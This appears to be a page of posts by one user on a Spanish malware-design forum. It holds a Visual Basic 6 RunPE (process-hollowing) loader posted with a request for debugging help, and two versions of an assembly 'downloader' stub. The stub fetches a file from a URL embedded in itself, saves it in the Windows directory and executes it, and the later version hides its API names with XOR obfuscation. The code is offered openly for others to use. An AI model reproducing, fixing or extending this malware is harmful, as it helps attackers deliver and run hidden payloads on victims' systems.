|
1052
|
Seguridad Informática / Análisis y Diseño de Malware / Ayuda creacion RunPE VB6
|
en: 28 Enero 2011, 20:54 pm
|
Bueno, estoi intentando aprender como trabaja el loader de windows y me e puesto a hacer un runPE, viendo como funcionan otros y tal despues de haber leido varias veces sobre el formato PE, pero tengo problemas, no me funciona correctamente el api NtUnmapViewOfSection ni VirtualAllocEx y nose porque no funcionan bien... el código que tengo es el siguiente: Option Explicit Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function NtUnmapViewOfSection Lib "NTDLL.dll" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long) As Long Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Const CONTEXT_FULL As Long = &H10007 Private Const MAX_PATH As Integer = 260 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Const IMAGE_SIZEOF_SHORT_NAME = 8 Private Type IMAGE_SECTION_HEADER SecName As String * IMAGE_SIZEOF_SHORT_NAME VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type Public Function EjecutarPE(ByVal Ruta As String) As Boolean On Error GoTo error Dim IDH As IMAGE_DOS_HEADER Dim INH As IMAGE_NT_HEADERS Dim ISH() As IMAGE_SECTION_HEADER Dim IDD As IMAGE_DATA_DIRECTORY Dim Datos() As Byte ReDim Datos(FileLen(Ruta)) Open Ruta For Binary As #1 Get #1, , Datos Close #1 Call CopyMemory(IDH, Datos(0), Len(IDH)) Call CopyMemory(INH, Datos(IDH.e_lfanew), Len(INH)) Dim MYe_lfanew As Long: MYe_lfanew = IDH.e_lfanew Dim MYImageBase As Long: MYImageBase = INH.OptionalHeader.ImageBase Dim MYSizeOfImage As Long: MYSizeOfImage = INH.OptionalHeader.SizeOfImage Dim MYSizeOfHeaders As Long: MYSizeOfHeaders = INH.OptionalHeader.SizeOfHeaders Dim MYAddressOfEntryPoint As Long: MYAddressOfEntryPoint = INH.OptionalHeader.AddressOfEntryPoint Dim MYNumberOfSections As Integer: MYNumberOfSections = INH.FileHeader.NumberOfSections Dim MYVirtualAddress As Long Dim MYPointerToRawData As Long Dim MYSizeOfRawData As Long Dim ManijaProceso As Long Dim pi As PROCESS_INFORMATION Dim si As STARTUPINFO Dim NTUN As Long Dim Espacio As Long Dim IdProc As Long Call CreateProcessA(App.Path & "\" & App.EXEName & ".exe", 0, 0, 0, False, CREATE_SUSPENDED, 0, 0, si, pi) ManijaProceso = pi.dwProcessId NTUN = NtUnmapViewOfSection(ManijaProceso, MYImageBase) Espacio = VirtualAllocEx(ManijaProceso, MYImageBase, MYSizeOfImage, &H1000& Or &H2000&, &H40) Exit Function error: EjecutarPE = False End Function
Agradeceria que alguien me dijese que ago mal. salu2!
|
|
|
1055
|
Seguridad Informática / Análisis y Diseño de Malware / Re: mDownloader
|
en: 16 Diciembre 2010, 17:09 pm
|
Bueno, aqui esta el código mejorado: include 'win32ax.inc' .data manija dd ? larchivo dd ? espacio dd ? bleidos dd ? dll db 'rukjhi)ckk',0 funcion db 'RUKChpikhfcShAnkbF',0 añadir db '%windir%\archivo.exe',0 ruta dd ? .code start: xor eax, eax mov eax, [FS:eax+0x30] mov eax, [DS:eax+0x10] mov eax, [DS:eax+0x3C] invoke CreateFileW,eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 mov [manija],eax invoke GetFileSize,[manija],0 mov [larchivo],eax invoke GlobalAlloc,GPTR,[larchivo] mov [espacio],eax invoke ReadFile,[manija],[espacio],[larchivo],addr bleidos,0 invoke CloseHandle,[manija] mov ecx,1 mov eax,[espacio] add [larchivo],10 bucle: .if byte[eax+ecx] = '#' inc ecx .if byte[eax+ecx] = '#' inc ecx .if byte[eax+ecx] = '#' inc ecx add eax,ecx mov [espacio],eax jmp salir .endif dec ecx .endif dec ecx .endif .if ecx > [larchivo] jmp salir .endif inc ecx jmp bucle salir: invoke GlobalAlloc,GPTR,1024 mov [ruta],eax invoke ExpandEnvironmentStrings,añadir,[ruta],1024 stdcall Cifrar,dll invoke LoadLibrary,eax push eax stdcall Cifrar,funcion mov ecx,eax pop eax invoke GetProcAddress,eax,ecx push 0 push 0 push [ruta] push [espacio] push 0 call eax invoke ShellExecute,0,"open",[ruta],0,0,0 leave ret proc Cifrar,Cadena xor ecx,ecx mov eax,[Cadena] .bucle: .if byte[eax+ecx] = 0 jmp .salir .endif xor byte[eax+ecx],7 inc ecx jmp .bucle .salir: ret endp .end start
Había leido sobre la estructura PEB y habia visto ese código tuyo en otro post de yst sino recuerdo mal.. XD Bueno, no e mejorado lo de encontrar la firma que separa porque creo que así se adapta mas a lo que yo quiero y puedo añadir una firma con la longitud que quiera. salu2!
|
|
|
1057
|
Seguridad Informática / Análisis y Diseño de Malware / mDownloader
|
en: 15 Diciembre 2010, 20:31 pm
|
Bueno, aqui les traigo el código de un downloader uqe e creado en fasm , solo dejo el código del Stub que es lo interesante jeje. ;Stub de mDownloader ;Codeado por Drinky94 en diciembre de 2010 ;www.drinky94. artehack .net include 'win32ax.inc' .data ruta dd ? manija dd ? larchivo dd ? espacio dd ? bleidos dd ? dll db 'urlmon.dll',0 funcion db 'URLDownloadToFileA',0 mUrl dd ? dlls db 'msvcrt.dll',0 funcions db 'getenv',0 shell dd ? user db 'windir',0 añadir db '\archivo.exe',0 destino dd ? .code start: invoke GlobalAlloc,GPTR,1024 mov [ruta],eax invoke GetModuleFileName,0,[ruta],1024 invoke CreateFile,[ruta], GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 mov [manija],eax invoke GetFileSize,[manija],0 mov [larchivo],eax invoke GlobalAlloc,GPTR,[larchivo] mov [espacio],eax invoke ReadFile,[manija],[espacio],[larchivo],addr bleidos,0 invoke CloseHandle,[manija] mov ecx,1 mov eax,[espacio] add [larchivo],10 bucle: .if byte[eax+ecx] = '#' inc ecx .if byte[eax+ecx] = '#' inc ecx .if byte[eax+ecx] = '#' inc ecx add eax,ecx mov [espacio],eax jmp salir .endif dec ecx .endif dec ecx .endif .if ecx > [larchivo] jmp salir .endif inc ecx jmp bucle salir: invoke LoadLibrary,dlls invoke GetProcAddress,eax,funcions mov [shell],eax push user call [shell] invoke lstrcat,eax,añadir mov [destino],eax invoke LoadLibrary,dll invoke GetProcAddress,eax,funcion mov [mUrl],eax push 0 push 0 push [destino] push [espacio] push 0 call [mUrl] invoke ShellExecute,0,"open",[destino],0,0,0 leave ret .end start
Espero que a alguien le sirva salu2!
|
|
|
|
|
|
|